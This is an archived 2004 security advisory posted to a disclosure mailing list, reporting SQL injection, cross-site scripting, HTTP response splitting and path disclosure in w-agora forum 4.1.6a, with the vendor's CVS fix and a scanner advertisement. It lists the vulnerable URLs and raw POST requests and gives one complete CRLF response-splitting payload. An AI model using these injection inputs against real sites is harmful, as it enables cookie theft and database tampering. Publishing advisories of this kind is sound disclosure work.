Multiple vulnerabilities in w-agora forum

From: Alexander Antipov (antipov_at_SecurityLab.ru)
Date: 09/30/04

  • Next message: Martin Schulze: "[SECURITY] [DSA 555-1] New frenet6 packages fix potential information leak" 
    To: <full-disclosure@lists.netsys.com>
Date: Thu, 30 Sep 2004 12:41:17 +0400

    http://www.maxpatrol.com/mp_advisory.asp

    Title: Multiple vulnerabilities in w-agora forum
    Date: 28.09.04
    Severity: Medium
    Application: w-agora 4.1.6a, http://www.w-agora/en/download.php
    Platform: PHP
     
     I. DESCRIPTION
     
     Multiple vulnerabilities were found in w-agora forum. A remote user
     can conduct SQL injection attack, HTTP response splitting and Cross
    site
     Scripting attack.

     1. SQL injection
     
    redir_url.php?bn=demos_links&key=[SQL]
     
     2. XSS in GET:

    download_thread.php?site=support&bn=support_install&thread=[XSS
     code here]
     
     3. XSS in POST:

     
     POST /login.php HTTP/1.1
     Host: w-agora
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 89
     loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1
     
      
      POST /forgot_password.php HTTP/1.1
     Host: w-agora
     Content-Type: application/x-www-form-urlencoded
     Content-Length: 48
     go=1&userid=[XSS code here]
     
      
     4. HTTP response splitting
     
    /subscribe_thread.php?site=support&bn=support_in
     
    stall&thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aConte
    nt-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScan
    ned%20by%20PTsecurity%3c/html%3e%0d%0a

    5. Path discourse
    /list.php?bn=support_install&last=19&collapse=|id|

    II. IMPACT

    ----------
    A remote user can access the target user's cookies (including
    authentication cookies).
    A remote user can cause SQL commands to be executed by the underlying
    database.

    III. SOLUTION

    -------------
    Yes
      

    IV. VENDOR FIX/RESPONSE

    -----------------------

    Yes, Fixed in CVS : subscribe_thread.php3,v 1.17, forgot_password.php3
    v1.17, include/auth.php v1.45, list.php3 v1.53,
     

     V. CREDIT

    -------------

     This vulnerability was discovered by Positive Technologies using
    MaxPatrol (www.maxpatrol.com) - intellectual professional security
    scanner. It is able to detect a substantial amount of vulnerabilities
    not published yet. MaxPatrol's intelligent algorithms are also capable
    to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
    code injections, HTTP Response splitting and other).

  • Next message: Martin Schulze: "[SECURITY] [DSA 555-1] New frenet6 packages fix potential information leak"

    Relevant Pages

    • [Full-Disclosure] Multiple vulnerabilities in w-agora forum
      ... Multiple vulnerabilities in w-agora forum ... Multiple vulnerabilities were found in w-agora forum. ... can conduct SQL injection attack, ... A remote user can access the target user's cookies (including ...
      (Full-Disclosure)
    • Multiple vulnerabilities in w-agora forum
      ... Multiple vulnerabilities in w-agora forum ... Multiple vulnerabilities were found in w-agora forum. ... can conduct SQL injection attack, ... A remote user can access the target user's cookies (including ...
      (Full-Disclosure)
    • [Full-Disclosure] Multiple vulnerabilities in w-agora forum
      ... Multiple vulnerabilities in w-agora forum ... Multiple vulnerabilities were found in w-agora forum. ... can conduct SQL injection attack, ... A remote user can access the target user's cookies (including ...
      (Full-Disclosure)
    • [Full-Disclosure] Multiple vulnerabilities in w-agora forum
      ... Multiple vulnerabilities in w-agora forum ... Multiple vulnerabilities were found in w-agora forum. ... can conduct SQL injection attack, ... A remote user can access the target user's cookies (including ...
      (Full-Disclosure)